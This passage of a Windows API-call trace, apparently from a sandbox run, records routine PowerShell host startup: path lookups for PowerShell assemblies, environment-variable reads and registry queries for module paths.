lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.857] GetLastError () returned 0x7a [0146.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.857] GetLastError () returned 0x7a [0147.080] GetConsoleTitleW (in: lpConsoleTitle=0x348b88, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.080] GetLastError () returned 0x7a [0147.168] GetConsoleTitleW (in: lpConsoleTitle=0x348b88, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.168] GetLastError () returned 0x7a [0147.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0147.168] GetLastError () returned 0x7a [0147.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e37c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0147.168] GetLastError () returned 0x7a [0147.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e37c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0147.168] GetLastError () returned 0x7a [0148.142] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0148.142] GetLastError () returned 0x7a [0148.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.142] GetLastError () returned 0x7a [0148.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.142] GetLastError () returned 0x7a [0148.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.142] GetLastError () returned 0x7a [0148.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.143] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e418, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0148.175] GetLastError () returned 0x7a [0148.212] SetConsoleCtrlHandler (HandlerRoutine=0x28d384a, Add=1) returned 1 [0148.212] GetLastError () returned 0x7a [0149.206] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338 [0149.206] GetLastError () returned 0x0 [0149.209] CoCreateGuid (in: pguid=0x23e8f8 | out: pguid=0x23e8f8*(Data1=0xe028f83d, Data2=0xe06f, Data3=0x42ce, Data4=([0]=0x9b, [1]=0x9b, [2]=0xaf, [3]=0xde, [4]=0xa7, [5]=0xf4, [6]=0x43, [7]=0xd))) returned 0x0 [0149.297] WinSqmIsOptedIn () returned 0x0 [0149.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.298] GetLastError () returned 0xcb [0149.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.323] GetLastError () returned 0xcb [0149.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.324] GetLastError () returned 0xcb [0149.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.324] GetLastError () returned 0xcb [0149.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.325] GetLastError () returned 0xcb [0149.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.326] GetLastError () returned 0xcb [0149.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.326] GetLastError () returned 0xcb [0149.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.327] GetLastError () returned 0xcb [0149.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.334] GetLastError () returned 0xcb [0149.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.361] GetLastError () returned 0xcb [0149.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.364] GetLastError () returned 0xcb [0149.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.364] GetLastError () returned 0xcb [0150.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.013] GetLastError () returned 0xcb [0150.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.013] GetLastError () returned 0xcb [0150.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.013] GetLastError () returned 0xcb [0150.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.013] GetLastError () returned 0xcb [0150.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.142] GetLastError () returned 0x3 [0150.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.142] GetLastError () returned 0x3 [0150.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.142] GetLastError () returned 0x3 [0150.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.142] GetLastError () returned 0x3 [0150.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.143] GetLastError () returned 0x3 [0150.148] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0150.148] GetLastError () returned 0x3 [0150.159] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x357e88, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0150.159] GetLastError () returned 0x3 [0150.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e710 | out: phkResult=0x23e710*=0x344) returned 0x0 [0150.160] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x23e754, lpData=0x0, lpcbData=0x23e750*=0x0 | out: lpType=0x23e754*=0x2, lpData=0x0, lpcbData=0x23e750*=0x6c) returned 0x0 [0150.165] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x23e754, lpData=0x357e88, lpcbData=0x23e750*=0x6c | out: lpType=0x23e754*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x23e750*=0x6c) returned 0x0 [0150.165] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x357e88, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0150.165] GetLastError () returned 0x3 [0150.165] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x357e88, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0150.165] GetLastError () returned 0x3 [0150.166] RegCloseKey (hKey=0x344) returned 0x0 [0150.166] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x357e88, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0150.166] GetLastError () returned 0x3 [0150.166] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e710 | out: phkResult=0x23e710*=0x344) returned 0x0 [0150.167] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x23e754, lpData=0x0, lpcbData=0x23e750*=0x0 | out: lpType=0x23e754*=0x0, lpData=0x0, lpcbData=0x23e750*=0x0) returned 0x2 [0150.167] RegCloseKey (hKey=0x344) returned 0x0 [0150.218] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x357e88 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0150.219] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x23e278, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0150.219] GetLastError () returned 0x3f0 [0150.220] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0150.220] GetLastError () returned 0x3f0 [0150.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.230] GetLastError () returned 0xcb [0150.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.232] GetLastError () returned 0xcb [0150.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.239] GetLastError () returned 0xcb [0150.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.239] GetLastError () returned 0xcb [0150.245] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e690 | out: phkResult=0x23e690*=0x34c) returned 0x0 [0150.253] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6f8, lpData=0x0, lpcbData=0x23e6f4*=0x0 | out: lpType=0x23e6f8*=0x1, lpData=0x0, lpcbData=0x23e6f4*=0x74) returned 0x0 [0150.254] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6d8, lpData=0x0, lpcbData=0x23e6d4*=0x0 | out: lpType=0x23e6d8*=0x1, lpData=0x0, lpcbData=0x23e6d4*=0x74) returned 0x0 [0150.254] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x23e6d8, lpData=0x357e88, lpcbData=0x23e6d4*=0x74 | out: lpType=0x23e6d8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x23e6d4*=0x74) returned 0x0 [0150.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x23e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0150.254] GetLastError () returned 0xcb [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x23e6d8 | out: lpFileInformation=0x23e6d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0150.254] GetLastError () returned 0xcb [0150.254] SetErrorMode (uMode=0x1) returned 0x1 [0150.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e24c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.258] GetLastError () returned 0xcb [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6cc | out: lpFileInformation=0x23e6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0150.258] GetLastError () returned 0xcb [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e24c, 